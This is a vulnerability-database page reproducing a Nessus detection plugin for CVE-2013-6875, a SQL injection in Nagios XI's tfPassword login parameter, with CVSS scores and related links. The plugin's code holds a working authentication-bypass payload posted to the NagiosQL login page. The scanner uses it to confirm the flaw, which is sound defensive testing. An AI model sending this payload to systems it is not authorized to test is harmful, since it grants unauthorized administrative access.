Lucene search
This script is Copyright (C) 2013-2024 and is owned by Tenable, Inc. or an Affiliate thereof.NAGIOSXI_2012R2_4.NASLHistoryDec 26, 2013 - 12:00 a.m.
Nagios XI < 2012R2.4 tfPassword Parameter SQL Injection
2013-12-2600:00:00
This script is Copyright (C) 2013-2024 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
18
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7.4
Confidence
Low
EPSS
0.661
Percentile
98.0%
The remote web server hosts a version of Nagios Core Config Manager, a modified version of NagiosQL for Nagios XI, and is affected by a SQL injection vulnerability. The vulnerability exists in the ‘functions/prepend_adm.php’ script, which fails to properly sanitize user-supplied input to the ‘tfPassword’ parameter before using it in database queries. This could allow an attacker to manipulate such queries, resulting in manipulation or disclosure of arbitrary data.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(71636);
script_version("1.8");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");
script_cve_id("CVE-2013-6875");
script_bugtraq_id(63754);
script_name(english:"Nagios XI < 2012R2.4 tfPassword Parameter SQL Injection");
script_set_attribute(attribute:"synopsis", value:
"The remote host has a web application that is affected by a SQL
injection vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote web server hosts a version of Nagios Core Config Manager, a
modified version of NagiosQL for Nagios XI, and is affected by a SQL
injection vulnerability. The vulnerability exists in the
'functions/prepend_adm.php' script, which fails to properly sanitize
user-supplied input to the 'tfPassword' parameter before using it in
database queries. This could allow an attacker to manipulate such
queries, resulting in manipulation or disclosure of arbitrary data.");
script_set_attribute(attribute:"see_also", value:"https://assets.nagios.com/downloads/nagiosxi/CHANGES-2012.TXT");
# http://www.security-assessment.com/files/documents/advisory/NagiosQL%20Core%20Config%20Manager%20SQL%20Injection%20Vulnerability%20Advisory%20-%20DA.pdf
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?888e1914");
script_set_attribute(attribute:"solution", value:
"Upgrade to Nagios XI 2012R2.4 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2013/11/13");
script_set_attribute(attribute:"patch_publication_date", value:"2013/09/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/12/26");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:nagios:nagios_xi");
script_set_attribute(attribute:"cpe", value:"cpe:/a:nagiosql:nagiosql");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("nagios_enterprise_detect.nasl", "nagiosql_detect.nbin");
script_require_keys("www/nagios_xi", "www/nagiosql");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("url_func.inc");
include("webapp_func.inc");
# Get the ports that web servers have been found on.
port = get_http_port(default:80, php:TRUE);
# Get details of the install.
nagiosql_install = get_install_from_kb(appname:"nagiosql", port:port, exit_on_fail:TRUE);
dir = nagiosql_install["dir"];
url = build_url(port:port, qs:dir + "/");
sql = urlencode(str:'\') OR 1=1 limit 1;-- ');
postdata = "tfUsername=" + SCRIPT_NAME + "&tfPassword=" + sql + "&Submit=Login";
item = dir + "/index.php";
contenttype = "application/x-www-form-urlencoded";
res = http_send_recv3(
method : "POST",
item : item,
data : postdata,
content_type : contenttype,
port : port,
follow_redirect: 1,
exit_on_fail : TRUE
);
if (
"Configuration User: nagiosadmin" >< res[2] &&
'logout=yes">Logout</a></td>' >< res[2]
)
{
set_kb_item(name:"www/"+port+"/SQLInjection", value:TRUE);
# Report our findings.
if (report_verbosity > 0)
{
report =
'\nNessus was able to verify the issue exists by using the following ' +
'request information :' +
'\n' +
'\n' + "POST " + item +
'\n' + "Content-Type: " + contenttype +
'\n' +
'\n' + postdata +
'\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
}
else audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, "Nagios XI", url, "Nagios Core Config Manager");
Related
nvd
nvd
CVE-2013-6875
2013-11-26 16:55:03
openvas
openvas
Nagios XI SQLi Vulnerability (Dec 2013) - Active Check
2013-12-02 00:00:00
cvelist
cvelist
CVE-2013-6875
2013-11-26 16:00:00
cve
cve
CVE-2013-6875
2013-11-26 16:55:03
exploitdb
exploitdb
Nagios XI - 'tfPassword' SQL Injection
2013-12-13 00:00:00
prion
prion
Sql injection
2013-11-26 16:55:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7.4
Confidence
Low
EPSS
0.661
Percentile
98.0%
Related for NAGIOSXI_2012R2_4.NASL